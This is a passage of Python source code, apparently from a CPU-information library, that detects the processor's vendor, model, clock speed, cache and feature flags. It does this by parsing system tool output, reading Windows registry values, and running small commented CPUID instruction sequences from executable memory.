return run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
return processor_brand
@staticmethod
def winreg_vendor_id():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
vendor_id = winreg.QueryValueEx(key, "VendorIdentifier")[0]
winreg.CloseKey(key)
return vendor_id
@staticmethod
def winreg_raw_arch_string():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
raw_arch_string = winreg.QueryValueEx(key, "PROCESSOR_ARCHITECTURE")[0]
winreg.CloseKey(key)
return raw_arch_string
@staticmethod
def winreg_hz_actual():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
hz_actual = winreg.QueryValueEx(key, "~Mhz")[0]
winreg.CloseKey(key)
hz_actual = to_hz_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
feature_bits = winreg.QueryValueEx(key, "FeatureSet")[0]
winreg.CloseKey(key)
return feature_bits
def obj_to_b64(thing):
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def b64_to_obj(thing):
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def run_and_get_stdout(command, pipe_command=None):
if not pipe_command:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p1.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p1.returncode, output
else:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
p2 = subprocess.Popen(pipe_command, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output = p2.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p2.returncode, output
def program_paths(program_name):
paths = []
exts = filter(None, os.environ.get('PATHEXT', '').split(os.pathsep))
path = os.environ['PATH']
for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
def _get_hz_string_from_brand(processor_brand):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in processor_brand.lower():
return (1, '0.0')
hz_brand = processor_brand.lower()
scale = 1
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
if '@' in hz_brand:
hz_brand = hz_brand.split('@')[1]
else:
hz_brand = hz_brand.rsplit(None, 1)[1]
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
return (scale, hz_brand)
def to_friendly_hz(ticks, scale):
# Get the raw Hz as a string
left, right = to_raw_hz(ticks, scale)
ticks = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = ticks.index('.')
ticks = ticks.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
ticks = '{0}.{1}'.format(ticks[:-scale-1], ticks[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
ticks = '{0:.4f} {1}'.format(float(ticks), symbol)
ticks = ticks.rstrip('0')
return ticks
def to_raw_hz(ticks, scale):
# Scale the numbers
ticks = ticks.lstrip('0')
old_index = ticks.index('.')
ticks = ticks.replace('.', '')
ticks = ticks.ljust(scale + old_index+1, '0')
new_index = old_index + scale
ticks = '{0}.{1}'.format(ticks[:new_index], ticks[new_index:])
left, right = ticks.split('.')
left, right = int(left), int(right)
return (left, right)
def to_hz_string(ticks):
# Convert to string
ticks = '{0}'.format(ticks)
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
return ticks
def to_friendly_bytes(input):
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
def _parse_cpu_string(cpu_string):
# Get location of fields at end of string
fields_index = cpu_string.find('(', cpu_string.find('@'))
#print(fields_index)
# Processor Brand
processor_brand = cpu_string
if fields_index != -1:
processor_brand = cpu_string[0 : fields_index].strip()
#print('processor_brand: ', processor_brand)
fields = None
if fields_index != -1:
fields = cpu_string[fields_index : ]
#print('fields: ', fields)
# Hz
scale, hz_brand = _get_hz_string_from_brand(processor_brand)
# Various fields
vendor_id, stepping, model, family = (None, None, None, None)
if fields:
try:
fields = fields.rsplit('(', 1)[1].split(')')[0].split(',')
fields = [f.strip().lower() for f in fields]
fields = [f.split(':') for f in fields]
fields = [{f[0].strip() : f[1].strip()} for f in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
except:
#raise
pass
return (processor_brand, hz_brand, scale, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_string(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
processor_brand, hz_actual, scale, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
#print('FIELDS: ', (vendor_id, stepping, model, family))
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_actual'] = to_friendly_hz(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
info['hz_actual_raw'] = to_raw_hz(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except:
#raise
pass
return {}
def parse_arch(raw_arch_string):
arch, bits = None, None
raw_arch_string = raw_arch_string.lower()
# X86
if re.match(r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', raw_arch_string):
arch = 'X86_32'
bits = 32
elif re.match('^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', raw_arch_string):
arch = 'X86_64'
bits = 64
# ARM
elif re.match('^arm64$|^arm64[a-z]$|^arm64-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv8-a|aarch64$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', raw_arch_string):
arch = 'ARM_7'
bits = 32
elif re.match('^armv8$|^armv8[a-z]$|^armv8-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match('^ppc32$|^prep$|^pmac$|^powermac$', raw_arch_string):
arch = 'PPC_32'
bits = 32
elif re.match('^powerpc$|^ppc64$|^ppc64le$', raw_arch_string):
arch = 'PPC_64'
bits = 64
# S390X
elif re.match('^s390x$', raw_arch_string):
arch = 'S390X'
bits = 64
# SPARC
elif re.match('^sparc32$|^sparc$', raw_arch_string):
arch = 'SPARC_32'
bits = 32
elif re.match('^sparc64$|^sun4u$|^sun4v$', raw_arch_string):
arch = 'SPARC_64'
bits = 64
# MIPS
elif re.match('^mips$', raw_arch_string):
arch = 'MIPS_32'
bits = 32
elif re.match('^mips64$', raw_arch_string):
arch = 'MIPS_64'
bits = 64
# LOONG
elif re.match('^loongarch32$', raw_arch_string):
arch = 'LOONG_32'
bits = 32
elif re.match('^loongarch64$', raw_arch_string):
arch = 'LOONG_64'
bits = 64
return (arch, bits)
def is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = False
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = DataSource.sestatus_allow_execheap()
can_selinux_exec_memory = DataSource.sestatus_allow_execmem()
self.is_selinux_enforcing = (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# FIXME: We should not have to use different instructions to
# set eax to 0 or 1, on 32bit and 64bit machines.
def _zero_eax(self):
return (
b"\x31\xC0" # xor eax,eax
)
def _zero_ecx(self):
return (
b"\x31\xC9" # xor ecx,ecx
)
def _one_eax(self):
return (
b"\xB8\x01\x00\x00\x00" # mov eax,0x1"
)
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
self._zero_eax(),
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each 4bits is a ascii letter in the name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : is_bit_set(edx, 0),
'vme' : is_bit_set(edx, 1),
'de' : is_bit_set(edx, 2),
'pse' : is_bit_set(edx, 3),
'tsc' : is_bit_set(edx, 4),
'msr' : is_bit_set(edx, 5),
'pae' : is_bit_set(edx, 6),
'mce' : is_bit_set(edx, 7),
'cx8' : is_bit_set(edx, 8),
'apic' : is_bit_set(edx, 9),
#'reserved1' : is_bit_set(edx, 10),
'sep' : is_bit_set(edx, 11),
'mtrr' : is_bit_set(edx, 12),
'pge' : is_bit_set(edx, 13),
'mca' : is_bit_set(edx, 14),
'cmov' : is_bit_set(edx, 15),
'pat' : is_bit_set(edx, 16),
'pse36' : is_bit_set(edx, 17),
'pn' : is_bit_set(edx, 18),
'clflush' : is_bit_set(edx, 19),
#'reserved2' : is_bit_set(edx, 20),
'dts' : is_bit_set(edx, 21),
'acpi' : is_bit_set(edx, 22),
'mmx' : is_bit_set(edx, 23),
'fxsr' : is_bit_set(edx, 24),
'sse' : is_bit_set(edx, 25),
'sse2' : is_bit_set(edx, 26),
'ss' : is_bit_set(edx, 27),
'ht' : is_bit_set(edx, 28),
'tm' : is_bit_set(edx, 29),
'ia64' : is_bit_set(edx, 30),
'pbe' : is_bit_set(edx, 31),
'pni' : is_bit_set(ecx, 0),
'pclmulqdq' : is_bit_set(ecx, 1),
'dtes64' : is_bit_set(ecx, 2),
'monitor' : is_bit_set(ecx, 3),
'ds_cpl' : is_bit_set(ecx, 4),
'vmx' : is_bit_set(ecx, 5),
'smx' : is_bit_set(ecx, 6),
'est' : is_bit_set(ecx, 7),
'tm2' : is_bit_set(ecx, 8),
'ssse3' : is_bit_set(ecx, 9),
'cid' : is_bit_set(ecx, 10),
#'reserved3' : is_bit_set(ecx, 11),
'fma' : is_bit_set(ecx, 12),
'cx16' : is_bit_set(ecx, 13),
'xtpr' : is_bit_set(ecx, 14),
'pdcm' : is_bit_set(ecx, 15),
#'reserved4' : is_bit_set(ecx, 16),
'pcid' : is_bit_set(ecx, 17),
'dca' : is_bit_set(ecx, 18),
'sse4_1' : is_bit_set(ecx, 19),
'sse4_2' : is_bit_set(ecx, 20),
'x2apic' : is_bit_set(ecx, 21),
'movbe' : is_bit_set(ecx, 22),
'popcnt' : is_bit_set(ecx, 23),
'tscdeadline' : is_bit_set(ecx, 24),
'aes' : is_bit_set(ecx, 25),
'xsave' : is_bit_set(ecx, 26),
'osxsave' : is_bit_set(ecx, 27),
'avx' : is_bit_set(ecx, 28),
'f16c' : is_bit_set(ecx, 29),
'rdrnd' : is_bit_set(ecx, 30),
'hypervisor' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : is_bit_set(ebx, 1),
'sgx' : is_bit_set(ebx, 2),
'bmi1' : is_bit_set(ebx, 3),
'hle' : is_bit_set(ebx, 4),
'avx2' : is_bit_set(ebx, 5),
#'reserved' : is_bit_set(ebx, 6),
'smep' : is_bit_set(ebx, 7),
'bmi2' : is_bit_set(ebx, 8),
'erms' : is_bit_set(ebx, 9),
'invpcid' : is_bit_set(ebx, 10),
'rtm' : is_bit_set(ebx, 11),
'pqm' : is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : is_bit_set(ebx, 13),
'mpx' : is_bit_set(ebx, 14),
'pqe' : is_bit_set(ebx, 15),
'avx512f' : is_bit_set(ebx, 16),
'avx512dq' : is_bit_set(ebx, 17),
'rdseed' : is_bit_set(ebx, 18),
'adx' : is_bit_set(ebx, 19),
'smap' : is_bit_set(ebx, 20),
'avx512ifma' : is_bit_set(ebx, 21),
'pcommit' : is_bit_set(ebx, 22),
'clflushopt' : is_bit_set(ebx, 23),
'clwb' : is_bit_set(ebx, 24),
'intel_pt' : is_bit_set(ebx, 25),
'avx512pf' : is_bit_set(ebx, 26),
'avx512er' : is_bit_set(ebx, 27),
'avx512cd' : is_bit_set(ebx, 28),
'sha' : is_bit_set(ebx, 29),
'avx512bw' : is_bit_set(ebx, 30),
'avx512vl' : is_bit_set(ebx, 31),
'prefetchwt1' : is_bit_set(ecx, 0),
'avx512vbmi' : is_bit_set(ecx, 1),
'umip' : is_bit_set(ecx, 2),
'pku' : is_bit_set(ecx, 3),
'ospke' : is_bit_set(ecx, 4),
#'reserved' : is_bit_set(ecx, 5),
'avx512vbmi2' : is_bit_set(ecx, 6),
#'reserved' : is_bit_set(ecx, 7),
'gfni' : is_bit_set(ecx, 8),
'vaes' : is_bit_set(ecx, 9),
'vpclmulqdq' : is_bit_set(ecx, 10),
'avx512vnni' : is_bit_set(ecx, 11),
'avx512bitalg' : is_bit_set(ecx, 12),
#'reserved' : is_bit_set(ecx, 13),
'avx512vpopcntdq' : is_bit_set(ecx, 14),
#'reserved' : is_bit_set(ecx, 15),
#'reserved' : is_bit_set(ecx, 16),
#'mpx0' : is_bit_set(ecx, 17),
#'mpx1' : is_bit_set(ecx, 18),
#'mpx2' : is_bit_set(ecx, 19),
#'mpx3' : is_bit_set(ecx, 20),
#'mpx4' : is_bit_set(ecx, 21),
'rdpid' : is_bit_set(ecx, 22),
#'reserved' : is_bit_set(ecx, 23),
#'reserved' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
#'reserved' : is_bit_set(ecx, 26),
#'reserved' : is_bit_set(ecx, 27),
#'reserved' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
'sgx_lc' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : is_bit_set(ebx, 0),
'vme' : is_bit_set(ebx, 1),
'de' : is_bit_set(ebx, 2),
'pse' : is_bit_set(ebx, 3),
'tsc' : is_bit_set(ebx, 4),
'msr' : is_bit_set(ebx, 5),
'pae' : is_bit_set(ebx, 6),
'mce' : is_bit_set(ebx, 7),
'cx8' : is_bit_set(ebx, 8),
'apic' : is_bit_set(ebx, 9),
#'reserved' : is_bit_set(ebx, 10),
'syscall' : is_bit_set(ebx, 11),
'mtrr' : is_bit_set(ebx, 12),
'pge' : is_bit_set(ebx, 13),
'mca' : is_bit_set(ebx, 14),
'cmov' : is_bit_set(ebx, 15),
'pat' : is_bit_set(ebx, 16),
'pse36' : is_bit_set(ebx, 17),
#'reserved' : is_bit_set(ebx, 18),
'mp' : is_bit_set(ebx, 19),
'nx' : is_bit_set(ebx, 20),
#'reserved' : is_bit_set(ebx, 21),
'mmxext' : is_bit_set(ebx, 22),
'mmx' : is_bit_set(ebx, 23),
'fxsr' : is_bit_set(ebx, 24),
'fxsr_opt' : is_bit_set(ebx, 25),
'pdpe1gp' : is_bit_set(ebx, 26),
'rdtscp' : is_bit_set(ebx, 27),
#'reserved' : is_bit_set(ebx, 28),
'lm' : is_bit_set(ebx, 29),
'3dnowext' : is_bit_set(ebx, 30),
'3dnow' : is_bit_set(ebx, 31),
'lahf_lm' : is_bit_set(ecx, 0),
'cmp_legacy' : is_bit_set(ecx, 1),
'svm' : is_bit_set(ecx, 2),
'extapic' : is_bit_set(ecx, 3),
'cr8_legacy' : is_bit_set(ecx, 4),
'abm' : is_bit_set(ecx, 5),
'sse4a' : is_bit_set(ecx, 6),
'misalignsse' : is_bit_set(ecx, 7),
'3dnowprefetch' : is_bit_set(ecx, 8),
'osvw' : is_bit_set(ecx, 9),
'ibs' : is_bit_set(ecx, 10),
'xop' : is_bit_set(ecx, 11),
'skinit' : is_bit_set(ecx, 12),
'wdt' : is_bit_set(ecx, 13),
#'reserved' : is_bit_set(ecx, 14),
'lwp' : is_bit_set(ecx, 15),
'fma4' : is_bit_set(ecx, 16),
'tce' : is_bit_set(ecx, 17),
#'reserved' : is_bit_set(ecx, 18),
'nodeid_msr' : is_bit_set(ecx, 19),
#'reserved' : is_bit_set(ecx, 20),
'tbm' : is_bit_set(ecx, 21),
'topoext' : is_bit_set(ecx, 22),
'perfctr_core' : is_bit_set(ecx, 23),
'perfctr_nb' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
'dbx' : is_bit_set(ecx, 26),
'perftsc' : is_bit_set(ecx, 27),
'pci_l2i' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
#'reserved' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_kb' : ecx & 0xFF,
'line_size_b' : (ecx >> 12) & 0xF,
'associativity' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32, address = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
